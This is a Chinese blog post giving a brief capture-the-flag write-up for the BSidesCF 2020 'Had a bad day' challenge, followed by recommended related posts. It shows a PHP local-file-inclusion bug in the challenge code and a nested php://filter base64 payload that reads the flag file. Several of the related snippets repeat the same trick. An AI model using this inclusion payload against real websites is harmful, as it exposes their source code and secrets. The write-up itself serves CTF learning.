[BSidesCF 2020]Had a bad day--利用php:filter伪协议嵌套

最新推荐文章于 2023-02-03 00:15:00 发布
最新推荐文章于 2023-02-03 00:15:00 发布
阅读量404 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao17441898/article/details/117473025
版权

题目比较简单直接解题吧。
从报错信息可以看出,里面有include函数。并且发现他拼接了一个.php后缀
在这里插入图片描述解码:
在这里插入图片描述

<?php
			$file = $_GET['category'];
			if(isset($file))
			{
				if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
					include ($file . '.php');
				}
				else{
					echo "Sorry, we currently only support woofers and meowers.";
				}
			}
			?>

发现只要包含三个字符串中的一个就能正常执行。利用PHP伪协议的嵌套。
php://filter/read=convert.base64-encode/index/resource=flag
在这里插入图片描述

熊是本熊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
[BSidesCF 2020]Had a bad day 1(协议嵌套
weixin_45577185的博客
09-06 232
先用php://filter/read=convert.base64-encode/resource=index.php读取index.php的页面代码看看,发现读取不成功,后来才发现.php是后来加上去的 php://filter/read=convert.base64-encode/resource=index 然后用base64解密 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers".
华普莱特HAD-V系列DC-DC电源模块产品手册
03-23
华普莱特HAD-V系列DC-DC电源模块产品手册.pdf 介绍了关于华普莱特HAD-V系列DC-DC电源模块产品手册的详细说明,提供模块电源的技术资料的下载。
[BSidesCF 2020]Had a bad day(php://filter协议嵌套
stantic的博客
05-30 361
进来让我选一个,那就选一个 发现url有一个参数,点击两个页面,值不同,怀疑是两个不停的文件,试一试index 应该是直接在值后面自动加了个后缀名, 随便输入,说不包含,那应该就是文件包含,看一看能不能读取index.php的源码 php://filter/read=convert.base64-encode/resource=index 用get的方式传一个参数,看这个参数里有没有 woofers,meowers,index 有就包含,并在最后加php后缀,也就是说要达到包...
协议filter_代码审计php协议利用
weixin_39613089的博客
01-13 769
“作者:小刚一位苦于信息安全的萌新小白帽,记得本实验仅用于信息防御教学,切勿用于它用途”什么是协议PHP 带有很多内置URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。file://访问本地文件系统http://访问 HTTP(s) 网址ftp://访问 FTP(s) URLsphp://访...
PHP协议包含源码
weixin_33933118的博客
11-19 566
等待笔记。。。 转载于:https://www.cnblogs.com/AardWolf/p/9986593.html
php协议总结
h0ld1rs的博客
08-12 2719
文章目录file:// 协议条件:作用:说明用法php:// 协议条件作用:例子zip:// & bzip2:// & zlib:// 协议条件作用用法data:// 协议条件作用用法示例phar:// 协议用法 file:// 协议 条件: allow_url_fopen:off/on allow_url_include :off/on 作用: 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。 inclu
#笔记(三十七)#PHP协议小结
vircorns的博客
03-01 166
官方文档 大佬总结 file://— 访问本地文件系统 用法 /path/to/file.ext relative/path/to/file.ext fileInCwd.ext C:/path/to/winfile.ext C:\path\to\winfile.ext \smbserver\share\path\to\winfile.ext file:///path/to/file.ext ...
upptime:had hada-io的正常运行时间监控器和状态页面,由@upptime提供支持
02-09
: :green_square: 所有系统均可运行Upptime( )是开源的正常运行时间监控器和状态页面,完全由GitHub Actions和Issues支持。 网址状态历史响应时间正常运行时间 :green_square: 向上 1029ms :green_square: 向上 ...
hada-practica-grupal
04-02
Descripcióndel videojuego { sinopsis,añode lanzamiento,empresa,编辑,国际翻译... } 预告片 早产儿 热内罗 泛欧游戏信息(PEGI) Creadores de contenido asociados(Twitch,YouTube
WHM.rar_hadamard_walsh_walsh hadamard_walsh transform_walsh-hada
09-14
快速Walsh--Hadamard(WHM)变换与反变换程序示例
HAD-entertainment_hub:HAD2项目
05-19
Create React App入门该项目是通过引导的。可用脚本在项目目录中,可以运行:npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误...
php:filter协议之[BSidesCF 2020]Had a bad day
qq_58970968的博客
07-21 169
但是只要是含有woofers的字符串就会是另外的语法错误,猜测后面试有一个字符串匹配函数;phpfilter//read=convert.base64-encode/resource=文件名;他已经把.php后缀加上了,意思是执行的是参数的PHP文件,那么就很可能是flag;也可以index得到源码;...
NO.2-13
nigo134的博客
07-27 213
首先利用PHP协议读取index.php源代码 payload如下: php://filter/read=convert.base64-encode/resource=index 结果如图所示 源代码如下 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" )
php相关的知识了解一下(二)
farmerXU的博客
09-30 152
函数内访问全局变量需要global关键字或者使用$GLOBALS[index]数组 <?php $x=5; $y=10; function myTest() { global $x,$y; $y=$x+$y; //或者 $GLOBALS['y']=$GLOBALS['x']+$GLOBALS['y']; } myTest(); echo $y; // 输出 15 ?> ...
php7的判断中文函数,php判断浏览器以及strpos函数
weixin_39772352的博客
04-01 150
需要用到php判断浏览器,于是google了,下出来的都是相同的于是就copy了下来就开始用,结果在判断Opera的时候卡壳了整死都出不来,于是搜索了下strpos函数,解释是“返回字符串在另一个字符串中第一次出现的位置”再看了下官方的解释,顿时觉悟,被坑惨了。。。strpos函数官方用大字告诉我们“此函数可能返回布尔值FALSE,但也可能返回等同于FALSE的非布尔值,例如0或 “”(...
【CTF】ctf中用到的php协议总结及例题(持续更)
weixin_52450702的博客
02-03 2830
ctf中用到的php协议总结及例题
php 敏感关键词检测,PHP中使用strpos函数实现屏蔽敏感关键字功能
weixin_34775101的博客
03-09 405
现在网络信息监管很严格,特别是屏蔽关键字。特别是现在WEB2.0时代,网站的内容几乎都是来自网民发布,站长管理即可。如果你希望别人在你站点禁止发布某个关键字,那么就需要预先做处理。用PHP做关键字屏蔽的功能样式有多种多样,如正则是最普遍的一种,这里就不一一例举,本文介绍使用PHP函数strpos屏蔽关键字的功能。思路:一、把关键字专门写在一个文本文件里,每行一个,数量不限,有多少写多少。二、PHP...
BUUCTF [BSidesCF 2020] Had a bad day
Senimo
12-11 531
BUUCTF [BSidesCF 2020] Had a bad day 考点: php协议嵌套 启动环境: 其中包含两个按钮,选择猫和狗的图片: 此时的URL变为: http://xxx/index.php?category=meowers 其中包含有GET传参,尝试修改category传入的值,得到报错: 其中为include()函数报错,尝试获取index.php页面的源码:php://filter/read=convert.base64-encode/resource=index.php
2021-02-07
m0_53314778的博客
02-07 185
[BSidesCF 2020]Had a bad day 考点: php协议嵌套 启动环境: 其中包含两个按钮,选择猫和狗的图片: 此时的URL变为:http://xxx/index.php?category=meowers 观察url,猜测sql注入 其中包含有GET传参,尝试修改category传入的值,得到报错: 弹出include报错,那就是文件包含了 尝试获取index.php页面的源码:php://filter/read=convert.base64-encode/resource=inde
1: In install.packages("devtools") : installation of package ‘systemfonts’ had non-zero exit status 2: In install.packages("devtools") : installation of package ‘xml2’ had non-zero exit status 3: In install.packages("devtools") : installation of package ‘textshaping’ had non-zero exit status 4: In install.packages("devtools") : installation of package ‘roxygen2’ had non-zero exit status 5: In install.packages("devtools") : installation of package ‘rversions’ had non-zero exit status 6: In install.packages("devtools") : installation of package ‘urlchecker’ had non-zero exit status 7: In install.packages("devtools") : installation of package ‘ragg’ had non-zero exit status 8: In install.packages("devtools") : installation of package ‘pkgdown’ had non-zero exit status 9: In install.packages("devtools") : installation of package ‘devtools’ had non-zero exit status
最新发布
05-26
这些错误提示表明在安装 devtools 包时,依赖的其他包出现了安装问题。建议你逐一尝试安装这些包,以便确定是哪个包引起了问题。你可以尝试使用以下命令安装缺失的包: ```R install.packages("systemfonts") install.packages("xml2") install.packages("textshaping") install.packages("roxygen2") install.packages("rversions") install.packages("urlchecker") install.packages("ragg") install.packages("pkgdown") ``` 如果你遇到了问题,请检查你的网络连接和 R 包管理器是否正常工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值